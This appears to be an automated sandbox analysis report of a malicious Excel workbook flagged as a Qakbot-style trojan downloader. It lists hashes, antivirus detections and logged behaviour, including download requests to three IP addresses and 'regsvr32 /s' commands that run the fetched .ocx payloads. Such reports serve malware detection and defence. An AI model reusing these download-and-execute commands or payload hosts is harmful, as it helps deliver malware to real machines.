Summary | ZeroBOX

ATTR-147470270-Apr-4.xlsb

Malicious Library; Excel Binary Workbook file format (xlsb)

Category: FILE
Machine: s1_win7_x6402
Started: April 6, 2022, 5:19 p.m.
Completed: April 6, 2022, 5:22 p.m.
Size: 1.2MB
Type: Microsoft Excel 2007+
MD5 31d57098f695e4a999a109309cc6cc6a
SHA256 8b711bf4fd44853bbd5e833d5b472a7d7214ab637083eaf99590acd1aca8691a
CRC32 1AB43DE4
ssdeep 24576:vvTXkVoeBosJ0Rev1ke6P00TDKqKxBNKxBvKxBfKxBdKxBVKxBOId:vDkvBokCP00XKq+N+v+f+d+V+OY
Yara
  • xlsb - Excel Binary Workbook file format detection
  • Malicious_Library_Zero - Malicious_Library

Name  Response  Post-Analysis Lookup
No hosts contacted.

IP Address      Status  Action
149.255.36.223  Active  Moloch
164.124.101.2   Active  Moloch
185.33.86.42    Active  Moloch
185.82.126.17   Active  Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

suspicious_features: Connection to IP address; suspicious_request: GET http://185.82.126.17/44651,6679619213.dat
suspicious_features: Connection to IP address; suspicious_request: GET http://149.255.36.223/44651,6679619213.dat
suspicious_features: Connection to IP address; suspicious_request: GET http://185.33.86.42/44651,6679619213.dat
request: GET http://185.82.126.17/44651,6679619213.dat
request: GET http://149.255.36.223/44651,6679619213.dat
request: GET http://185.33.86.42/44651,6679619213.dat
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2100
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75260000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 2100
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b4b3000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

file: C:\ProgramData\Frister.ocx
file: C:\ProgramData\Frister1.ocx
file: C:\ProgramData\Frister2.ocx
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000414
filepath: C:\Users\test22\AppData\Local\Temp\~$ATTR-147470270-Apr-4.xlsb
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$ATTR-147470270-Apr-4.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
status: 1  return: 0  repeated: 0

cmdline: regsvr32 /s C:\ProgramData\Frister.ocx
cmdline: regsvr32 /s C:\ProgramData\Frister2.ocx
cmdline: regsvr32 /s C:\ProgramData\Frister1.ocx
host: 149.255.36.223
host: 185.33.86.42
host: 185.82.126.17
Sangfor Malware.Generic-XLM.Save.ma35
Cyren XF/SneakyBin.E.gen!Eldorado
Avast VBS:Malware-gen
ClamAV Xls.Downloader.GreenOffice12210-9918618-0
Kaspersky HEUR:Trojan.MSOffice.Generic
Tencent Trojan.MsOffice.Macro40.11003135
McAfee-GW-Edition Artemis
Ikarus Trojan-Downloader.XLM.Agent
Microsoft TrojanDownloader:O97M/Qakbot.AMDG!MTB
ZoneAlarm HEUR:Trojan.MSOffice.Generic
GData Macro.Trojan-Downloader.Agent.BDH
Fortinet MSExcel/Agent.IF!tr.dldr
AVG VBS:Malware-gen
Time & API Arguments Status Return Repeated

URLDownloadToFileW

url: http://185.82.126.17/44651,6679619213.dat
stack_pivoted: 0
filepath_r: C:\ProgramData\Frister.ocx
filepath: C:\ProgramData\Frister.ocx
return: 2148270088  repeated: 0

URLDownloadToFileW

url: http://149.255.36.223/44651,6679619213.dat
stack_pivoted: 0
filepath_r: C:\ProgramData\Frister1.ocx
filepath: C:\ProgramData\Frister1.ocx
return: 2148270088  repeated: 0

URLDownloadToFileW

url: http://185.33.86.42/44651,6679619213.dat
stack_pivoted: 0
filepath_r: C:\ProgramData\Frister2.ocx
filepath: C:\ProgramData\Frister2.ocx
return: 2148270088  repeated: 0

parent_process: excel.exe; martian_process: regsvr32 /s C:\ProgramData\Frister.ocx
parent_process: excel.exe; martian_process: regsvr32 /s C:\ProgramData\Frister2.ocx
parent_process: excel.exe; martian_process: regsvr32 /s C:\ProgramData\Frister1.ocx